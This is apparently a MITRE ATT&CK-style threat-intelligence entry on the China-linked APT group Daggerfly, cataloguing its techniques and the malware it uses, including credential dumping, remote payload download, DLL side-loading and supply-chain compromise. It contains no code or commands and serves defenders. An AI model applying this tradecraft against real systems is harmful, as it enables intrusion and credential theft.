Daggerfly

Daggerfly is a People's Republic of China-linked APT entity active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of MgBot malware and is noted for several potential supply chain infection campaigns.[1][2][3][4]

ID: G1034
Associated Groups: Evasive Panda, BRONZE HIGHLAND
Contributors: Furkan Celik, PURE7
Version: 1.0
Created: 25 July 2024
Last Modified: 31 October 2024

Associated Group Descriptions

Name Description
Evasive Panda

[1][4]

BRONZE HIGHLAND

[1][4]

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Daggerfly uses HTTP for command and control communication.[4]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.[1]

Enterprise T1584 .004 Compromise Infrastructure: Server

Daggerfly compromised web servers hosting updates for software as part of a supply chain intrusion.[4]

Enterprise T1136 .001 Create Account: Local Account

Daggerfly created a local account on victim machines to maintain access.[1]

Enterprise T1587 .002 Develop Capabilities: Code Signing Certificates

Daggerfly created code signing certificates to sign malicious macOS files.[4]

Enterprise T1189 Drive-by Compromise

Daggerfly has used strategic website compromise for initial access against victims.[4]

Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.[1] Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.[4]

Enterprise T1105 Ingress Tool Transfer

Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.[1]

Enterprise T1036 .003 Masquerading: Rename System Utilities

Daggerfly used a renamed version of rundll32.exe, such as "dbengin.exe" located in the ProgramData\Microsoft\PlayReady directory, to proxy malicious DLL execution.[1]

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.[1]

Enterprise T1012 Query Registry

Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines.[1]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Daggerfly has attempted to use scheduled tasks for persistence in victim environments.[4]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.[4]

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

Daggerfly is associated with several supply chain compromises using malicious updates to compromise victims.[2][4]

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.[1]

Enterprise T1082 System Information Discovery

Daggerfly utilizes victim machine operating system information to create custom User Agent strings for subsequent command and control communication.[4]

Enterprise T1204 .001 User Execution: Malicious Link

Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.[4]

Software

ID Name References Techniques
S0190 BITSAdmin Daggerfly has used BITSAdmin to retrieve files from remote locations to run on victim systems.[1] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S1016 MacMa Daggerfly is linked to the use and potentially development of MacMa through overlapping command and control infrastructure and shared libraries with other unique tools.[3] Audio Capture, Command and Scripting Interpreter: Unix Shell, Create or Modify System Process: Launch Agent, Credentials from Password Stores: Keychain, Data from Local System, Data Staged: Local Data Staging, Deobfuscate/Decode Files or Information, Encrypted Channel, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal: Clear Linux or Mac System Logs, Indicator Removal: Timestomp, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Keylogging, Native API, Non-Application Layer Protocol, Non-Standard Port, Process Discovery, Remote Services, Screen Capture, Subvert Trust Controls: Code Signing, Subvert Trust Controls: Gatekeeper Bypass, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery
S1146 MgBot Daggerfly is uniquely associated with the use of MgBot since at least 2012.[2] Account Discovery: Domain Account, Account Discovery: Local Account, Audio Capture, Clipboard Data, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Data from Information Repositories, Data from Local System, Data from Removable Media, Domain Trust Discovery, Input Capture: Keylogging, Network Service Discovery, OS Credential Dumping, Process Discovery, Remote System Discovery, Steal Web Session Cookie, System Owner/User Discovery
S1147 Nightdoor Daggerfly uses Nightdoor as a backdoor mechanism for Windows hosts.[4][3] Application Layer Protocol, Command and Scripting Interpreter: Windows Command Shell, Deobfuscate/Decode Files or Information, Hijack Execution Flow, Indicator Removal: File Deletion, Process Discovery, Scheduled Task/Job: Scheduled Task, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery, Virtualization/Sandbox Evasion: System Checks, Web Service
S0013 PlugX Daggerfly has used PlugX loaders as part of intrusions.[1] Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Encrypted Channel: Symmetric Cryptography, File and Directory Discovery, Hide Artifacts: Hidden Files and Directories, Hijack Execution Flow: DLL Side-Loading, Hijack Execution Flow: DLL Search Order Hijacking, Ingress Tool Transfer, Input Capture: Keylogging, Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Modify Registry, Native API, Network Share Discovery, Non-Application Layer Protocol, Obfuscated Files or Information, Process Discovery, Query Registry, Screen Capture, System Network Connections Discovery, Trusted Developer Utilities Proxy Execution: MSBuild, Virtualization/Sandbox Evasion: System Checks, Web Service: Dead Drop Resolver
S0075 Reg Daggerfly has used Reg to dump various Windows registry hives from victim machines.[1] Modify Registry, Query Registry, Unsecured Credentials: Credentials in Registry

References